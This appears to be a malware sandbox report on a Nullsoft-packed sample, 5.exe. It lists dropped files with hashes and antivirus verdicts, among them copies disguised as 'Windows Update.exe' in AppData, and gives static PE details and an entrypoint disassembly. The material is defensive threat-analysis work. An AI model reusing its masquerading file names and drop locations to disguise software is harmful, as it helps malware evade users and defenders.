                                                                                            No context

                                                                                            ASN

                                                                                            No context

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_windows update.e_edbd6e1e925f10aab1172265a9dde5d263e57cc8_00000000_19b5ac3e\Report.wer
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.2381156674465787
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:nJJxLV5jGBr9B5wNg5wF1szvnuk1SKyaOGewD/u7sUS274It:JJxHjTUv1IUD/u7sUX4It
                                                                                            MD5:B47C10258EABC2107D7CB931765EF9C2
                                                                                            SHA1:C30F40027094229E864DD9FD98A1507C8A452B7C
                                                                                            SHA-256:853DEA8321711FFCCD7DDFD32EF9E5F2DF2B2219BCF276294829F0329D739A42
                                                                                            SHA-512:B5EA681207A478142F1466E87E14109E04DAB31903A345DF9A2EFBD27FE6625AAFB4360D04DB8744E10DA19EE514EBC9BE6B2B9F5B0952B3B7D66D87429302FE
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.3.4.0.3.4.7.2.9.1.2.8.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.3.4.0.3.4.7.9.8.6.5.9.8.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.1.2.3.c.1.d.-.6.0.0.5.-.4.7.d.a.-.8.2.a.4.-.0.2.e.4.9.3.0.6.f.f.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.6.4.-.0.0.0.1.-.0.0.1.6.-.c.d.3.6.-.7.4.c.7.d.9.e.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.1.f.4.7.9.8.5.d.3.d.4.4.a.1.6.f.b.7.6.b.2.7.3.a.7.6.a.9.7.f.d.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.8.f.7.d.c.c.8.f.f.c.d.d.3.f.9.3.3.3.3.e.7.1.1.7.7.9.e.8.d.0.2.d.b.2.d.f.a.e.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.0.6.:.0.1.:.0.0.:.4.5.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.7.5.....I.s.F.a.t.
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8916.tmp.WERInternalMetadata.xml
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):5678
                                                                                            Entropy (8bit):3.722759092557584
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RtIU6o7r3GLt3iTA6XNmveYZ7oSfG0gEBCaM1K3l1fW4Xm:Rrl7r3GLNiTA6XNPYZ7oSTCp1al1fW+m
                                                                                            MD5:94136E0292A080EF9BC9DE95B0562FAD
                                                                                            SHA1:FE778207D73A83BEB1EB8F76E266D7BAD7CDBEB8
                                                                                            SHA-256:89B141AE7F3571624582D21AA9A39151FD89923E1F63AA4B447843D0E7A9E0B1
                                                                                            SHA-512:457676B39EFC100D4805C94D49D779B3565C8817EE0096D26601914A15BCE6B5795503021B58B41D963D5DC4A1FEC351BFAEC5DEC91F022D28638412D4E2BC50
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.4.4.<./.P.i.d.>.......
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER952C.tmp.xml
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4640
                                                                                            Entropy (8bit):4.452188744668979
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwSD8zsHJgtWI97sSWSC8Bl8fm8M4JFKbnWtFvdo+q8vonWbyKw8d:uITfpIiSNwJFKgGKryKw8d
                                                                                            MD5:4D89C5EE828851195CA96A4029839F2B
                                                                                            SHA1:04E2024691DDD80771ECBD2D889871B159AB6048
                                                                                            SHA-256:DAB13F633497D9E34D97A212E375566566D745645492F43B4E8B9636344E4D2B
                                                                                            SHA-512:37C8F6ED9F436F5DBEFAB3968FAB07C7F981D38DF69E2B7762183B3CA8E42B6A67C8C809A9DCC0A9915E3519C09D83B481E637FE5623FFE437708424DF37455E
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1288048" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\5.exe.log
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):916
                                                                                            Entropy (8bit):5.282390836641403
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                                            MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                                            SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                                            SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                                            SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                                            C:\Users\user\AppData\Local\Temp\84a79tbwxmvn7adt
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):604159
                                                                                            Entropy (8bit):7.96721366302899
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:uL2jvzmCP0rI7B+0G36tX8j6FTkYcwpWFt7tVYkfv:uCjrml0hGqtXiuT5WX7zYk3
                                                                                            MD5:71353B7F9141FA3C5760ACE513F8C385
                                                                                            SHA1:A6DD26880269F3FAEADA77C5F74ADE2433AF78C3
                                                                                            SHA-256:FC517290096122DB50FF785F3E3FCE641EF2164EA93351A8655A43732344BF7C
                                                                                            SHA-512:CDD0A4C4278D24019837811E429312D572BEC638812B5C35EA52CAFB443719974E7C614216A499D1008F843F021E06F1F3B6AD6E66082E616EC14D876C8108C0
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29
                                                                                            Entropy (8bit):3.9614292709896417
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:oNUWJRWQJ:oNNJAQJ
                                                                                            MD5:1356096983613619F2F854C2D0BF76F2
                                                                                            SHA1:7BB60F42B1384287EDB1AB877A8A0FB6AEDC99BA
                                                                                            SHA-256:C34B7762C591577120ADE653C8013A77EBF52CD2E6C1977F35B5880735368A63
                                                                                            SHA-512:C94A70E0E5C8A82BDE56D1E655223027DE48A2905592A718BF23D16C4A3888FFD53403ED9E4165C737BB539A6F368C183EA6FAB9DECA8B18A6D46803185731AB
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: C:\Users\user\Desktop\5.exe
                                                                                            C:\Users\user\AppData\Local\Temp\bhv636.tmp
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcfcdb90, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):26738688
                                                                                            Entropy (8bit):0.9595225336393207
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:ydLv1SxfFUAxlse9zZi2Ou/iDyUOjoEO3PX2BU:nUAxtzU2Ouj
                                                                                            MD5:569753B9E1E0EE0EC6BB7DD64526EF68
                                                                                            SHA1:B1C6ED7C99BBCFE71AE734B49BEFFC6937D5A5D6
                                                                                            SHA-256:5D9DB55451D39E1C75AFBD61B28DDE86AFF0D6AD83B87E503A4FCB0310182A55
                                                                                            SHA-512:87B90EE777ADFD53DBD56389B0A34E2EC1657C2E5DFF6A0A0603371AB654E6593595A29FD4F55AC91D18656117CAE0C1FAD8E625A4C02D348BE3B935B3D710A5
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Qn:Qn
                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ..
                                                                                            C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dll
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):159744
                                                                                            Entropy (8bit):6.52147420132688
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                            MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                            SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                            SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                            SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%]..v]..v]..vP.(v}..vP..vR..vP.)v3..vI..wD..v]..v,..v...w\..v...w\..v..6v\..v...w\..vRich]..v........PE..L....`.a...........!......................................................................@.................................d....................................... ...............................@...@............................................text............................... ..`.rdata..Jf.......h..................@..@.data....p... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):159744
                                                                                            Entropy (8bit):6.52147420132688
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                            MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                            SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                            SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                            SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                            Reputation:unknown
                                                                                            C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):852277
                                                                                            Entropy (8bit):7.535786145318411
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                            MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                            SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                            SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                            SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 31%
                                                                                            Reputation:unknown
                                                                                            C:\Users\user\AppData\Roaming\Windows Update.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                            C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):852277
                                                                                            Entropy (8bit):7.535786145318411
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                            MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                            SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                            SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                            SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 31%
                                                                                            Reputation:unknown
                                                                                            C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                            C:\Users\user\AppData\Roaming\pid.txt
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):1.5
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:bn:b
                                                                                            MD5:21F4C3B5591DA245AF90A2FD52FA1A55
                                                                                            SHA1:7BF446DEFE82C44EDADC2E74AF4FE0340C4602D9
                                                                                            SHA-256:FF2FBB2C3BFF60DDA45042CBC05BC633AFC1719B19A9E74C55988C48A78C2FC3
                                                                                            SHA-512:A8DEBFD0429625D27B38B421BA212F32B790120600620DBE97E0C9E701CDC5F8C5F046A1EBC061D8943270732731993DBAC16BC08A12854970598912E9EA7957
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 6244
                                                                                            C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):50
                                                                                            Entropy (8bit):4.414177320667444
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:oNUkh4EaKC59KYr4a:oN9aZ534a
                                                                                            MD5:201BF2179D431C7E3205E5F410DCDB59
                                                                                            SHA1:3F774846910F70FC1BCC69DE05E8F9EA4D893F34
                                                                                            SHA-256:FBB871739943E63027102EF9DEECDFC261F94DD3FBB06087772EF705F182D13D
                                                                                            SHA-512:0047D87CC9E2C50FB2217A4F1200973B575D30195BE7DF04E2F6B494350178568338FAA802DBE41AA47EC64C5A5699AC66B88D8C821CF2DD1F0EF1B93446F0E4
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1572864
                                                                                            Entropy (8bit):4.268636026237426
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nG116Z3J4hRWwpVWovqTiOJ2F/vHbuOLDEwKYjjf4Fd+TfcgWyDUS2Ne:G116Z3J4hRWwpVW9766e
                                                                                            MD5:28BD5B449A28F93626BAC751415841BB
                                                                                            SHA1:6906DA97F0C289DF382F3C502E27BD15FC374B1F
                                                                                            SHA-256:BA1A411241BC4D75B53D9536975A937FF480B6D2B70807860E2AD88369398FB9
                                                                                            SHA-512:B92181E4B0BBF8B5D72ACF9A5C6367EF27CFF6496D2CE86668D253B9F733C900A3E8E1211F862F1A3BC24BABA044DB021EE0C3F943E2DE69F14E4A9B7C484391
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):24576
                                                                                            Entropy (8bit):2.846479762672498
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:/ZsL5qXQn1Of2oXPmxwpSuN5WEl8HG9N5WEl8H:/i17Uf2oOxwp1N5v8HON5v8H
                                                                                            MD5:A44D4C3671BCCB3F12915FD40CCBDCFA
                                                                                            SHA1:A4A6DD83C82EEC282E42359FCBA43E48EAEDA192
                                                                                            SHA-256:7E81E687CEC608228065A11A5231B4C28022BDFA9393613A4B4ECC3260EF4960
                                                                                            SHA-512:4D1F1188549F64A721A02983A99FF4AC2D93697113DC6A1AD7680275DB13182DA59BE095AE73C4AD300C399F5EE672EC0A46860EB2ED06016F3077DB15BF2CA5
                                                                                            Malicious:false
                                                                                            Reputation:unknown

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.535786145318411
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:5.exe
                                                                                            File size:852277
                                                                                            MD5:3f332b62eee0970f3189c689d5bd042a
                                                                                            SHA1:f68f7dcc8ffcdd3f93333e711779e8d02db2dfae
                                                                                            SHA256:7c7983ada08828ea0c0ed5b17b05f8dad5bf6fa44e1a4692c37f18c340e14219
                                                                                            SHA512:2399bf335b60b87d1126b7cd663dfd937be0da7fef815225d53940e5d01cf4b02969dc33d75e7b1f5f63b3233ed1ea179cc517c1c4639802293e4ea8cf25d5ef
                                                                                            SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                                                                            File Icon

                                                                                            Icon Hash:f0ec2e6e7ab68e70

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4030e3
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                            DLL Characteristics:
                                                                                            Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:7fa974366048f9c551ef45714595665e

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            sub esp, 00000180h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            xor ebx, ebx
                                                                                            push edi
                                                                                            mov dword ptr [esp+18h], ebx
                                                                                            mov dword ptr [esp+10h], 00409158h
                                                                                            xor esi, esi
                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                            call dword ptr [00407030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004070B0h]
                                                                                            push ebx
                                                                                            call dword ptr [0040727Ch]
                                                                                            push 00000008h
                                                                                            mov dword ptr [0042EC18h], eax
                                                                                            call 00007F8590EC94A8h
                                                                                            mov dword ptr [0042EB64h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+34h]
                                                                                            push 00000160h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 00428F90h
                                                                                            call dword ptr [00407158h]
                                                                                            push 0040914Ch
                                                                                            push 0042E360h
                                                                                            call 00007F8590EC915Fh
                                                                                            call dword ptr [004070ACh]
                                                                                            mov edi, 00434000h
                                                                                            push eax
                                                                                            push edi
                                                                                            call 00007F8590EC914Dh
                                                                                            push ebx
                                                                                            call dword ptr [0040710Ch]
                                                                                            cmp byte ptr [00434000h], 00000022h
                                                                                            mov dword ptr [0042EB60h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007F8590EC698Ch
                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                            mov eax, 00434001h
                                                                                            push dword ptr [esp+14h]
                                                                                            push eax
                                                                                            call 00007F8590EC8C40h
                                                                                            push eax
                                                                                            call dword ptr [0040721Ch]
                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                            jmp 00007F8590EC69E5h
                                                                                            cmp cl, 00000020h
                                                                                            jne 00007F8590EC6988h
                                                                                            inc eax
                                                                                            cmp byte ptr [eax], 00000020h
                                                                                            je 00007F8590EC697Ch
                                                                                            cmp byte ptr [eax], 00000022h
                                                                                            mov byte ptr [eax+eax+00h], 00000000h

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x2c6a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
